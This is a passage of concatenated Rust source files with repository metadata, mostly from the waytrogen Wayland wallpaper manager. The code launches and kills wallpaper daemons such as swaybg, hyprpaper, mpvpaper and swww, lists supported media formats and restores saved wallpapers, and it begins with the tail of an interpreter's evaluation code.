} impl crate::walk_mode::WalkElt for Ast { fn from_ast(a: &Ast) -> Ast { a.clone() } fn to_ast(&self) -> Ast { self.clone() } } pub fn eval_top(expr: &Ast) -> Result<Value, ()> { eval(expr, Assoc::new()) } pub fn eval(expr: &Ast, env: Assoc<Name, Value>) -> Result<Value, ()> { walk::<Eval>(expr, &LazyWalkReses::new_wrapper(env)) } pub fn neg_eval(pat: &Ast, env: Assoc<Name, Value>) -> Result<Assoc<Name, Value>, ()> { walk::<Destructure>(pat, &LazyWalkReses::new_wrapper(env)) } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct QQuote {} } custom_derive! { #[derive(Copy, Clone, Debug, Reifiable)] pub struct QQuoteDestr {} } impl WalkMode for QQuote { fn name() -> &'static str { "QQuote" } // Why not `Ast`? Because QQuote and Eval need to share environments. type Elt = Value; type Negated = QQuoteDestr; type AsPositive = QQuote; type AsNegative = QQuoteDestr; type Err = (); type D = crate::walk_mode::Positive<QQuote>; type ExtraInfo = (); fn walk_var(n: Name, _: &LazyWalkReses<Self>) -> Result<Value, ()> { Ok(val!(ast (vr n))) } fn walk_atom(n: Name, _: &LazyWalkReses<Self>) -> Result<Value, ()> { Ok(val!(ast (at n))) } // TODO #26: Just special-case "unquote" and "dotdotdot" fn get_walk_rule(f: &Form) -> WalkRule<QQuote> { f.quasiquote.pos().clone() } fn automatically_extend_env() -> bool { false } } impl WalkMode for QQuoteDestr { fn name() -> &'static str { "QQDes" } type Elt = Value; type Negated = QQuote; type AsPositive = QQuote; type AsNegative = QQuoteDestr; type Err = (); type D = crate::walk_mode::Negative<QQuoteDestr>; type ExtraInfo = (); fn walk_var(n: Name, cnc: &LazyWalkReses<Self>) -> Result<Assoc<Name, Value>, ()> { let val = val!(ast (vr n)); if cnc.context_elt() == &val { Ok(Assoc::<Name, Value>::new()) } else { Err(Self::qlit_mismatch_error(val, cnc.context_elt().clone())) } } fn walk_atom(n: Name, cnc: &LazyWalkReses<Self>) -> Result<Assoc<Name, Value>, ()> { let val = val!(ast (at n)); if cnc.context_elt() == &val { 
Ok(Assoc::<Name, Value>::new()) } else { Err(Self::qlit_mismatch_error(val, cnc.context_elt().clone())) } } // TODO #26: Just special-case "unquote" fn get_walk_rule(f: &Form) -> WalkRule<QQuoteDestr> { f.quasiquote.neg().clone() } fn automatically_extend_env() -> bool { false } } impl NegativeWalkMode for QQuoteDestr { fn needs_pre_match() -> bool { true } // Quoted syntax does have binding! } // `env` is a trap! We want a shifted `LazyWalkReses`! // pub fn qquote(expr: &Ast, env: Assoc<Name, Value>) -> Result<Value, ()> { // walk::<QQuote>(expr, &LazyWalkReses::new_wrapper(env)) // } // // pub fn qquote_destr(pat: &Ast, env: Assoc<Name, Value>) // -> Result<Assoc<Name, Value>,()> { // walk::<QQuoteDestr>(pat, &LazyWalkReses::new_wrapper(env)) // }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/swaybg.rs
src/swaybg.rs
use crate::{common::RGB, wallpaper_changers::WallpaperChangers}; use gettextrs::gettext; use gtk::{ gdk::RGBA, gio::Settings, glib::{self, clone}, prelude::*, Align, Box, ColorDialog, ColorDialogButton, DropDown, TextBuffer, }; use log::debug; use std::{path::Path, process::Command}; pub fn change_swaybg_wallpaper(swaybg_changer: WallpaperChangers, image: &Path, monitor: &str) { if let WallpaperChangers::Swaybg(mode, rgb) = swaybg_changer { let mut command = Command::new("swaybg"); if monitor != gettext("All") { command.arg("-o").arg(monitor); } command .arg("-i") .arg(image.to_str().unwrap()) .arg("-m") .arg(mode.to_string()) .arg("-c") .arg(rgb) .spawn() .unwrap() .wait() .unwrap(); } } pub fn generate_swaybg_changer_bar(changer_specific_options_box: &Box, settings: &Settings) { let dropdown = DropDown::from_strings(&[ &gettext("stretch"), &gettext("fit"), &gettext("fill"), &gettext("center"), &gettext("tile"), &gettext("solid_color"), ]); dropdown.set_halign(Align::Start); dropdown.set_valign(Align::Center); dropdown.set_margin_top(12); dropdown.set_margin_start(12); dropdown.set_margin_bottom(12); dropdown.set_margin_end(12); changer_specific_options_box.append(&dropdown); let color_dialog = ColorDialog::builder().with_alpha(false).build(); let color_picker = ColorDialogButton::builder() .halign(Align::Start) .valign(Align::Center) .margin_top(12) .margin_start(12) .margin_bottom(12) .margin_end(12) .dialog(&color_dialog) .build(); changer_specific_options_box.append(&color_picker); settings.bind("swaybg-mode", &dropdown, "selected").build(); let rgb_text_buffer = TextBuffer::builder().build(); color_picker.connect_rgba_notify(clone!( #[weak] settings, move |b| { let rgba = b.rgba(); let serialize_struct = RGB { red: rgba.red(), green: rgba.green(), blue: rgba.blue(), } .to_string(); debug!("{}: {}", gettext("Serialized RGB"), serialize_struct); rgb_text_buffer.set_text(&serialize_struct); settings .bind("swaybg-color", &rgb_text_buffer, "text") .build(); } )); 
let rgb = settings .string("swaybg-color") .to_string() .parse::<RGB>() .unwrap(); color_picker.set_rgba( &RGBA::builder() .red(rgb.red) .green(rgb.green) .blue(rgb.blue) .build(), ); }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/lib.rs
src/lib.rs
pub mod cli; pub mod common; pub mod database; pub mod dotfile; pub mod fs; pub mod hyprpaper; pub mod main_window; pub mod mpvpaper; pub mod swaybg; pub mod swww; pub mod ui_common; pub mod wallpaper_changers;
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/fs.rs
src/fs.rs
use crate::{common::sort_by_sort_dropdown_string, wallpaper_changers::WallpaperChangers}; use std::path::PathBuf; #[must_use] pub fn get_image_files( path: &str, sort_dropdown: &str, invert_sort_switch_state: bool, ) -> Vec<PathBuf> { let mut files = walkdir::WalkDir::new(path).follow_links(true).follow_root_links(true) .into_iter() .filter_map(std::result::Result::ok) .filter(|f| f.file_type().is_file()) .map(|d| d.path().to_path_buf()) .filter(|p| { WallpaperChangers::all_accepted_formats().iter().any(|f| { f == p .extension() .unwrap_or_default() .to_str() .unwrap_or_default() }) }) .collect::<Vec<_>>(); sort_by_sort_dropdown_string(&mut files, sort_dropdown, invert_sort_switch_state); files }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/wallpaper_changers.rs
src/wallpaper_changers.rs
use crate::{ common::RGB, hyprpaper::change_hyprpaper_wallpaper, mpvpaper::change_mpvpaper_wallpaper, swaybg::change_swaybg_wallpaper, swww::change_swww_wallpaper, }; use lazy_static::lazy_static; use regex::Regex; use serde::{Deserialize, Serialize}; use std::{fmt::Display, path::PathBuf, process::Command, str::FromStr, thread}; use strum::{IntoEnumIterator, VariantArray}; use strum_macros::{EnumIter, IntoStaticStr, VariantArray}; use which::which; pub trait WallpaperChanger { fn change(self, image: PathBuf, monitor: String); fn accepted_formats(&self) -> Vec<String>; fn kill(&self); } pub trait U32Enum { fn from_u32(i: u32) -> Self; fn to_u32(&self) -> u32; } #[derive(Debug, EnumIter, Clone, Default, Serialize, Deserialize, PartialEq)] pub enum WallpaperChangers { #[default] Hyprpaper, Swaybg(SwaybgModes, String), MpvPaper(MpvPaperPauseModes, MpvPaperSlideshowSettings, String), Swww( SWWWResizeMode, RGB, SWWWScallingFilter, SWWWTransitionType, u8, u32, u32, u16, SWWWTransitionPosition, bool, SWWWTransitionBezier, SWWWTransitionWave, ), } impl WallpaperChangers { pub fn killall_changers() { for changer in WallpaperChangers::iter() { changer.kill(); } } fn kill_all_changers_except(changer: &WallpaperChangers) { let varient = match changer { Self::Hyprpaper => Self::Hyprpaper, Self::Swaybg(_, _) => Self::Swaybg(SwaybgModes::default(), String::default()), Self::MpvPaper(_, _, _) => Self::MpvPaper( MpvPaperPauseModes::default(), MpvPaperSlideshowSettings::default(), String::default(), ), Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => Self::Swww( SWWWResizeMode::default(), RGB::default(), SWWWScallingFilter::default(), SWWWTransitionType::default(), u8::default(), u32::default(), u32::default(), u16::default(), SWWWTransitionPosition::default(), bool::default(), SWWWTransitionBezier::default(), SWWWTransitionWave::default(), ), }; WallpaperChangers::iter().for_each(|w| { if w != varient { w.kill(); } }); } #[must_use] pub fn all_accepted_formats() -> Vec<String> { 
let mut accepted_formats = vec![]; for changer in WallpaperChangers::iter() { for format in changer.accepted_formats() { if !accepted_formats.contains(&format) { accepted_formats.push(format); } } } accepted_formats } } #[derive(Debug, Clone, IntoStaticStr, VariantArray, Default, Serialize, Deserialize, PartialEq)] pub enum SwaybgModes { Stretch, Fit, #[default] Fill, Center, Tile, SolidColor, } #[derive(Debug, Clone, IntoStaticStr, VariantArray, Default, Serialize, Deserialize, PartialEq)] pub enum MpvPaperPauseModes { None, #[default] AutoPause, AutoStop, } #[derive(Debug, Clone, Default, Serialize, Deserialize, PartialEq)] pub struct MpvPaperSlideshowSettings { pub enable: bool, pub seconds: u32, } #[derive(Debug, Default, Serialize, Deserialize, Clone, VariantArray, PartialEq)] pub enum SWWWResizeMode { No, #[default] Crop, Fit, } impl U32Enum for SWWWResizeMode { fn from_u32(i: u32) -> Self { #[allow(clippy::cast_possible_truncation)] let i = i % Self::VARIANTS.len() as u32; match i { 0 => Self::No, 1 => Self::Crop, 2 => Self::Fit, _ => Self::default(), } } fn to_u32(&self) -> u32 { match self { Self::No => 0, Self::Crop => 1, Self::Fit => 2, } } } impl Display for SWWWResizeMode { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::No => write!(f, "no"), Self::Crop => write!(f, "crop"), Self::Fit => write!(f, "fit"), } } } #[derive(Debug, Default, Serialize, Deserialize, Clone, VariantArray, PartialEq)] pub enum SWWWScallingFilter { Nearest, Bilinear, CatmullRom, Mitchell, #[default] Lanczos3, } impl U32Enum for SWWWScallingFilter { fn from_u32(i: u32) -> Self { #[allow(clippy::cast_possible_truncation)] let i = i % Self::VARIANTS.len() as u32; match i { 0 => Self::Nearest, 1 => Self::Bilinear, 2 => Self::CatmullRom, 3 => Self::Mitchell, 4 => Self::Lanczos3, _ => Self::default(), } } fn to_u32(&self) -> u32 { match self { Self::Nearest => 0, Self::Bilinear => 1, Self::CatmullRom => 2, Self::Mitchell => 3, Self::Lanczos3 => 
4, } } } impl Display for SWWWScallingFilter { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::Nearest => write!(f, "Nearest"), Self::Bilinear => write!(f, "Bilinear"), Self::CatmullRom => write!(f, "CatmullRom"), Self::Mitchell => write!(f, "Mitchell"), Self::Lanczos3 => write!(f, "Lanczos3"), } } } #[derive(Debug, Default, Serialize, Deserialize, Clone, VariantArray, PartialEq)] pub enum SWWWTransitionType { None, #[default] Simple, Fade, Left, Right, Top, Bottom, Wipe, Wave, Grow, Center, Any, Outer, Random, } impl U32Enum for SWWWTransitionType { fn from_u32(i: u32) -> Self { #[allow(clippy::cast_possible_truncation)] let i = i % Self::VARIANTS.len() as u32; match i { 0 => Self::None, 1 => Self::Simple, 2 => Self::Fade, 3 => Self::Left, 4 => Self::Right, 5 => Self::Top, 6 => Self::Bottom, 7 => Self::Wipe, 8 => Self::Wave, 9 => Self::Grow, 10 => Self::Center, 11 => Self::Any, 12 => Self::Outer, 13 => Self::Random, _ => Self::default(), } } fn to_u32(&self) -> u32 { match self { Self::None => 0, Self::Simple => 1, Self::Fade => 2, Self::Left => 3, Self::Right => 4, Self::Top => 5, Self::Bottom => 6, Self::Wipe => 7, Self::Wave => 8, Self::Grow => 9, Self::Center => 10, Self::Any => 11, Self::Outer => 12, Self::Random => 13, } } } impl Display for SWWWTransitionType { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::None => write!(f, "none"), Self::Simple => write!(f, "simple"), Self::Fade => write!(f, "fade"), Self::Left => write!(f, "left"), Self::Right => write!(f, "right"), Self::Top => write!(f, "top"), Self::Bottom => write!(f, "bottm"), Self::Wipe => write!(f, "wipe"), Self::Wave => write!(f, "wave"), Self::Grow => write!(f, "grow"), Self::Center => write!(f, "center"), Self::Any => write!(f, "any"), Self::Outer => write!(f, "outer"), Self::Random => write!(f, "random"), } } } #[derive(Debug, Default, Serialize, Deserialize, Clone, PartialEq)] pub struct SWWWTransitionPosition { 
pub position: String, } impl Display for SWWWTransitionPosition { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!(f, "{}", self.position) } } lazy_static! { static ref swww_transition_pos_regex: Regex = Regex::new(r"(0.\d\d?,0\.\d\d?)|(\d+,\d+)|(center|top|left|right|bottom|top-left|top-right|bottom-left|bottom-right)").unwrap(); } impl SWWWTransitionPosition { pub fn new(s: &str) -> anyhow::Result<SWWWTransitionPosition> { if swww_transition_pos_regex.is_match(s) { Ok(Self { position: s.to_owned(), }) } else { Err(anyhow::anyhow!("Invalid Transition Position")) } } } #[derive(Debug, Serialize, Deserialize, Clone, PartialEq)] pub struct SWWWTransitionBezier { pub p0: f64, pub p1: f64, pub p2: f64, pub p3: f64, } impl Display for SWWWTransitionBezier { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!(f, "{},{},{},{}", self.p0, self.p1, self.p2, self.p3) } } impl Default for SWWWTransitionBezier { fn default() -> Self { Self { p0: 0.54, p1: 0.0, p2: 0.34, p3: 0.99, } } } #[derive(Debug, Serialize, Deserialize, Clone, PartialEq)] pub struct SWWWTransitionWave { pub width: u32, pub height: u32, } impl Display for SWWWTransitionWave { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { write!(f, "{},{}", self.width, self.height) } } impl Default for SWWWTransitionWave { fn default() -> Self { Self { width: 20, height: 20, } } } impl U32Enum for SwaybgModes { fn from_u32(i: u32) -> SwaybgModes { let i = (i as usize) % SwaybgModes::VARIANTS.len(); match i { 1 => Self::Fit, 2 => Self::Fill, 3 => Self::Center, 4 => Self::Tile, 5 => Self::SolidColor, _ => Self::Stretch, } } fn to_u32(&self) -> u32 { match self { Self::Stretch => 0, Self::Fit => 1, Self::Fill => 2, Self::Center => 3, Self::Tile => 4, Self::SolidColor => 5, } } } impl U32Enum for MpvPaperPauseModes { fn from_u32(i: u32) -> MpvPaperPauseModes { let i = (i as usize) % MpvPaperPauseModes::VARIANTS.len(); match i { 1 => Self::AutoPause, 2 => 
Self::AutoStop, _ => Self::None, } } fn to_u32(&self) -> u32 { match self { Self::None => 0, Self::AutoPause => 1, Self::AutoStop => 2, } } } impl FromStr for SwaybgModes { type Err = String; fn from_str(s: &str) -> Result<Self, Self::Err> { match &s.to_ascii_lowercase()[..] { "stretch" => Ok(Self::Stretch), "fit" => Ok(Self::Fit), "fill" => Ok(Self::Fill), "center" => Ok(Self::Center), "tile" => Ok(Self::Tile), "solid_color" => Ok(Self::SolidColor), _ => Err(format!("Unknown swaybg mode: {s}")), } } } impl Display for SwaybgModes { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::Stretch => write!(f, "stretch"), Self::Fit => write!(f, "fit"), Self::Fill => write!(f, "fill"), Self::Center => write!(f, "center"), Self::Tile => write!(f, "tile"), Self::SolidColor => write!(f, "solid_color"), } } } impl FromStr for MpvPaperPauseModes { type Err = String; fn from_str(s: &str) -> Result<Self, Self::Err> { match &s.to_lowercase()[..] { "none" => Ok(Self::None), "auto-pause" => Ok(Self::AutoPause), "auto-stop" => Ok(Self::AutoStop), _ => Err("Invalid pause mode".to_owned()), } } } impl Display for MpvPaperPauseModes { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { MpvPaperPauseModes::None => write!(f, "none"), MpvPaperPauseModes::AutoPause => write!(f, "auto-pause"), MpvPaperPauseModes::AutoStop => write!(f, "auto-stop"), } } } impl WallpaperChanger for WallpaperChangers { fn change(self, image: PathBuf, monitor: String) { Self::kill_all_changers_except(&self); thread::spawn(move || match self { Self::Hyprpaper => { change_hyprpaper_wallpaper(&image, &monitor); } Self::Swaybg(_, _) => { change_swaybg_wallpaper(self, &image, &monitor); } Self::MpvPaper(_, _, _) => { change_mpvpaper_wallpaper(&self, image, &monitor); } Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => { change_swww_wallpaper(self, image, monitor); } }); } fn accepted_formats(&self) -> Vec<String> { match self { Self::Hyprpaper => { 
vec![ "png".to_owned(), "jpg".to_owned(), "jpeg".to_owned(), "webp".to_owned(), "jxl".to_owned(), ] } Self::Swaybg(_, _) => vec![ "png".to_owned(), "jpg".to_owned(), "jpeg".to_owned(), "tiff".to_owned(), "tif".to_owned(), "tga".to_owned(), "gif".to_owned(), ], Self::MpvPaper(_, _, _) => { let mut mpvpaper_formats = vec![ "str".to_owned(), "aa".to_owned(), "aac".to_owned(), "aax".to_owned(), "ac3".to_owned(), "ac4".to_owned(), "acm".to_owned(), "adf".to_owned(), "adp".to_owned(), "dtk".to_owned(), "ads".to_owned(), "ss2".to_owned(), "adx".to_owned(), "aea".to_owned(), "afc".to_owned(), "aix".to_owned(), "al".to_owned(), "apc".to_owned(), "ape".to_owned(), "apl".to_owned(), "mac".to_owned(), "aptx".to_owned(), "aptxhd".to_owned(), "aqt".to_owned(), "ast".to_owned(), "obu".to_owned(), "avi".to_owned(), "avs".to_owned(), "avr".to_owned(), "avs".to_owned(), "avs2".to_owned(), "avs3".to_owned(), "bfstm".to_owned(), "bcstm".to_owned(), "binka".to_owned(), "bit".to_owned(), "bitpacked".to_owned(), "bmv".to_owned(), "bonk".to_owned(), "brstm".to_owned(), "avs".to_owned(), "cdg".to_owned(), "cdxl".to_owned(), "xl".to_owned(), "c2".to_owned(), "302".to_owned(), "daud".to_owned(), "str".to_owned(), "adp".to_owned(), "dfpwm".to_owned(), "dav".to_owned(), "dss".to_owned(), "dts".to_owned(), "dtshd".to_owned(), "dv".to_owned(), "dif".to_owned(), "cdata".to_owned(), "eac3".to_owned(), "ec3".to_owned(), "paf".to_owned(), "fap".to_owned(), "evc".to_owned(), "flm".to_owned(), "flac".to_owned(), "flv".to_owned(), "fsb".to_owned(), "fwse".to_owned(), "g722".to_owned(), "722".to_owned(), "tco".to_owned(), "rco".to_owned(), "g723_1".to_owned(), "g729".to_owned(), "genh".to_owned(), "gif".to_owned(), "gsm".to_owned(), "h261".to_owned(), "h26l".to_owned(), "h264".to_owned(), "264".to_owned(), "avc".to_owned(), "hca".to_owned(), "hevc".to_owned(), "h265".to_owned(), "265".to_owned(), "iamf".to_owned(), "idf".to_owned(), "ifv".to_owned(), "cgi".to_owned(), "ipu".to_owned(), "sf".to_owned(), 
"ircam".to_owned(), "ivr".to_owned(), "jxl".to_owned(), "kux".to_owned(), "laf".to_owned(), "lc3".to_owned(), "669".to_owned(), "abc".to_owned(), "amf".to_owned(), "ams".to_owned(), "dbm".to_owned(), "dmf".to_owned(), "dsm".to_owned(), "far".to_owned(), "it".to_owned(), "mdl".to_owned(), "med".to_owned(), "mid".to_owned(), "mod".to_owned(), "mt2".to_owned(), "mtm".to_owned(), "okt".to_owned(), "psm".to_owned(), "ptm".to_owned(), "s3m".to_owned(), "stm".to_owned(), "ult".to_owned(), "umx".to_owned(), "xm".to_owned(), "itgz".to_owned(), "itr".to_owned(), "itz".to_owned(), "mdgz".to_owned(), "mdr".to_owned(), "mdz".to_owned(), "s3gz".to_owned(), "s3r".to_owned(), "s3z".to_owned(), "xmgz".to_owned(), "xmr".to_owned(), "xmz".to_owned(), "669".to_owned(), "amf".to_owned(), "ams".to_owned(), "dbm".to_owned(), "digi".to_owned(), "dmf".to_owned(), "dsm".to_owned(), "dtm".to_owned(), "far".to_owned(), "gdm".to_owned(), "ice".to_owned(), "imf".to_owned(), "it".to_owned(), "j2b".to_owned(), "m15".to_owned(), "mdl".to_owned(), "med".to_owned(), "mmcmp".to_owned(), "mms".to_owned(), "mo3".to_owned(), "mod".to_owned(), "mptm".to_owned(), "mt2".to_owned(), "mtm".to_owned(), "nst".to_owned(), "okt".to_owned(), "plm".to_owned(), "ppm".to_owned(), "psm".to_owned(), "pt36".to_owned(), "ptm".to_owned(), "s3m".to_owned(), "sfx".to_owned(), "sfx2".to_owned(), "st26".to_owned(), "stk".to_owned(), "stm".to_owned(), "stp".to_owned(), "ult".to_owned(), "umx".to_owned(), "wow".to_owned(), "xm".to_owned(), "xpk".to_owned(), "flv".to_owned(), "dat".to_owned(), "lvf".to_owned(), "m4v".to_owned(), "mkv".to_owned(), "mk3d".to_owned(), "mka".to_owned(), "mks".to_owned(), "webm".to_owned(), "mca".to_owned(), "mcc".to_owned(), "mjpg".to_owned(), "mjpeg".to_owned(), "mpo".to_owned(), "j2k".to_owned(), "mlp".to_owned(), "mods".to_owned(), "moflex".to_owned(), "mov".to_owned(), "mp4".to_owned(), "m4a".to_owned(), "3gp".to_owned(), "3g2".to_owned(), "mj2".to_owned(), "psp".to_owned(), "m4b".to_owned(), 
"ism".to_owned(), "ismv".to_owned(), "isma".to_owned(), "f4v".to_owned(), "avif".to_owned(), "heic".to_owned(), "heif".to_owned(), "mp2".to_owned(), "mp3".to_owned(), "m2a".to_owned(), "mpa".to_owned(), "mpc".to_owned(), "mjpg".to_owned(), "txt".to_owned(), "mpl2".to_owned(), "sub".to_owned(), "msf".to_owned(), "mtaf".to_owned(), "ul".to_owned(), "musx".to_owned(), "mvi".to_owned(), "mxg".to_owned(), "v".to_owned(), "nist".to_owned(), "sph".to_owned(), "nsp".to_owned(), "nut".to_owned(), "obu".to_owned(), "ogg".to_owned(), "oma".to_owned(), "omg".to_owned(), "aa3".to_owned(), "osq".to_owned(), "pdv".to_owned(), "pjs".to_owned(), "pvf".to_owned(), "qoa".to_owned(), "yuv".to_owned(), "cif".to_owned(), "qcif".to_owned(), "rgb".to_owned(), "rt".to_owned(), "rsd".to_owned(), "rka".to_owned(), "rsd".to_owned(), "rso".to_owned(), "sw".to_owned(), "sb".to_owned(), "smi".to_owned(), "sami".to_owned(), "sbc".to_owned(), "msbc".to_owned(), "sbg".to_owned(), "scc".to_owned(), "sdns".to_owned(), "sdr2".to_owned(), "sds".to_owned(), "sdx".to_owned(), "ser".to_owned(), "sga".to_owned(), "shn".to_owned(), "vb".to_owned(), "son".to_owned(), "imx".to_owned(), "sln".to_owned(), "mjpg".to_owned(), "stl".to_owned(), "sub".to_owned(), "sub".to_owned(), "sup".to_owned(), "svag".to_owned(), "svs".to_owned(), "tak".to_owned(), "thd".to_owned(), "tta".to_owned(), "ans".to_owned(), "art".to_owned(), "asc".to_owned(), "diz".to_owned(), "ice".to_owned(), "nfo".to_owned(), "txt".to_owned(), "vt".to_owned(), "ty".to_owned(), "ty+".to_owned(), "uw".to_owned(), "ub".to_owned(), "usm".to_owned(), "v210".to_owned(), "yuv10".to_owned(), "vag".to_owned(), "vc1".to_owned(), "rcv".to_owned(), "viv".to_owned(), "idx".to_owned(), "vpk".to_owned(), "txt".to_owned(), "vqf".to_owned(), "vql".to_owned(), "vqe".to_owned(), "h266".to_owned(), "266".to_owned(), "vvc".to_owned(), "way".to_owned(), "wa".to_owned(), "vtt".to_owned(), "wsd".to_owned(), "xmd".to_owned(), "xmv".to_owned(), "xvag".to_owned(), 
"yop".to_owned(), "y4m".to_owned(), ]; let mut hyprpaper_formats = Self::Hyprpaper.accepted_formats(); let mut swaybg_formats = Self::Swaybg(SwaybgModes::Fill, "FFFFFF".to_owned()).accepted_formats(); mpvpaper_formats.append(&mut hyprpaper_formats); mpvpaper_formats.append(&mut swaybg_formats); mpvpaper_formats } Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => { vec![ "gif".to_owned(), "jpeg".to_owned(), "jpg".to_owned(), "png".to_owned(), "pnm".to_owned(), "tga".to_owned(), "tiff".to_owned(), "webp".to_owned(), "bmp".to_owned(), "farbfeld".to_owned(), ] } } } fn kill(&self) { match self { Self::Hyprpaper => Command::new("pkill") .arg("-9") .arg("hyprpaper") .spawn() .unwrap() .wait() .unwrap(), Self::Swaybg(_, _) => Command::new("pkill") .arg("-9") .arg("swaybg") .spawn() .unwrap() .wait() .unwrap(), Self::MpvPaper(_, _, _) => Command::new("pkill") .arg("mpvpaper") .spawn() .unwrap() .wait() .unwrap(), Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => Command::new("pkill") .arg("-9") .arg("swww-daemon") .spawn() .unwrap() .wait() .unwrap(), }; } } lazy_static! 
{ static ref swaybg_regex: Regex = Regex::new(r"swaybg (stretch|fit|fill||center|tile|solid_color) [0-9a-f]{6}").unwrap(); } impl Display for WallpaperChangers { fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { match self { Self::Hyprpaper => write!(f, "hyprpaper"), Self::Swaybg(_, _) => write!(f, "swaybg"), Self::MpvPaper(_, _, _) => write!(f, "mpvpaper"), Self::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => write!(f, "swww"), } } } pub fn get_available_wallpaper_changers() -> Vec<WallpaperChangers> { let mut available_changers = vec![]; for changer in WallpaperChangers::iter() { match changer { WallpaperChangers::Hyprpaper => match which( WallpaperChangers::Hyprpaper .to_string() .to_ascii_uppercase(), ) { Ok(_) => available_changers.push(changer), Err(_) => { if Command::new("systemctl") .arg("--user") .arg("list-unit-files") .arg("hyprpaper.service") .spawn() .unwrap() .wait() .unwrap() .success() { available_changers.push(changer); } } }, WallpaperChangers::Swaybg(_, _) => { append_changer_if_in_path(&mut available_changers, changer) } WallpaperChangers::MpvPaper(_, _, _) => { append_changer_if_in_path(&mut available_changers, changer) } WallpaperChangers::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => { append_changer_if_in_path(&mut available_changers, changer) } } } available_changers } fn append_changer_if_in_path( available_changers: &mut Vec<WallpaperChangers>, changer: WallpaperChangers, ) { if which(changer.to_string().to_lowercase()).is_ok() { available_changers.push(changer); } }
rust
Unlicense
b2cb8bedd81034cc410e5dd8b75cc51ce22b028f
2026-01-04T20:19:54.748529Z
false
nikolaizombie1/waytrogen
https://github.com/nikolaizombie1/waytrogen/blob/b2cb8bedd81034cc410e5dd8b75cc51ce22b028f/src/cli.rs
src/cli.rs
use crate::{ common::{ parse_executable_script, sort_by_sort_dropdown_string, Wallpaper, APP_ID, APP_VERSION, CACHE_FILE_NAME, CONFIG_APP_NAME, GETTEXT_DOMAIN, }, main_window::build_ui, ui_common::{gschema_string_to_string, string_to_gschema_string, SORT_DROPDOWN_STRINGS}, wallpaper_changers::{WallpaperChanger, WallpaperChangers}, }; use clap::Parser; use gettextrs::{bind_textdomain_codeset, bindtextdomain, getters, gettext, textdomain}; use gtk::{gio::Settings, glib, prelude::*, Application}; use log::debug; use rand::Rng; use std::{ env::current_exe, fs::{remove_file, File}, io::{BufRead, BufReader}, path::{Path, PathBuf}, thread, time::Duration, }; use log::{error, warn}; #[must_use] pub fn restore_wallpapers() -> glib::ExitCode { let settings = Settings::new(APP_ID); WallpaperChangers::killall_changers(); let previous_wallpapers = serde_json::from_str::<Vec<Wallpaper>>(&gschema_string_to_string( settings.string("saved-wallpapers").as_ref(), )) .unwrap(); for wallpaper in previous_wallpapers { debug!("Restoring: {:?}", wallpaper); wallpaper.clone().changer.change( PathBuf::from(wallpaper.clone().path), wallpaper.clone().monitor, ); match wallpaper.clone().changer { WallpaperChangers::Hyprpaper => { thread::sleep(Duration::from_millis(1000)); } WallpaperChangers::Swaybg(_, _) | WallpaperChangers::MpvPaper(_, _, _) | WallpaperChangers::Swww(_, _, _, _, _, _, _, _, _, _, _, _) => {} } } glib::ExitCode::SUCCESS } #[must_use] pub fn print_wallpaper_state() -> glib::ExitCode { let settings = Settings::new(APP_ID); println!( "{}", gschema_string_to_string(&settings.string("saved-wallpapers")) ); glib::ExitCode::SUCCESS } fn get_previous_wallpapers(settings: &Settings) -> Vec<Wallpaper> { let previous_wallpapers = serde_json::from_str::<Vec<Wallpaper>>(&gschema_string_to_string( settings.string("saved-wallpapers").as_ref(), )) .unwrap(); previous_wallpapers } fn get_previous_supported_wallpapers(settings: &Settings) -> Vec<PathBuf> { let previous_wallpapers = 
get_previous_wallpapers(settings); let wallpaper = previous_wallpapers[0].clone(); let path = Path::new(&wallpaper.path) .parent() .unwrap_or_else(|| Path::new("")); let files = walkdir::WalkDir::new(path) .follow_links(true) .follow_root_links(true) .into_iter() .filter_map(std::result::Result::ok) .filter(|f| f.file_type().is_file()) .map(|d| d.path().to_path_buf()) .filter(|p| { previous_wallpapers .iter() .map(|w| w.changer.clone()) .all(|c| { c.accepted_formats().iter().any(|f| { f == p .extension() .unwrap_or_default() .to_str() .unwrap_or_default() }) }) }) .collect::<Vec<_>>(); files } #[must_use] pub fn set_random_wallpapers() -> glib::ExitCode { let settings = Settings::new(APP_ID); let mut previous_wallpapers = get_previous_wallpapers(&settings); let files = get_previous_supported_wallpapers(&settings); WallpaperChangers::killall_changers(); for w in &mut previous_wallpapers { let mut rng = rand::thread_rng(); let index = rng.gen_range(0..files.len()); log::debug!("{index}"); w.changer .clone() .change(files[index].clone(), w.monitor.clone()); w.path = files[index].clone().to_str().unwrap_or_default().to_owned(); } match settings.set_string( "saved-wallpapers", 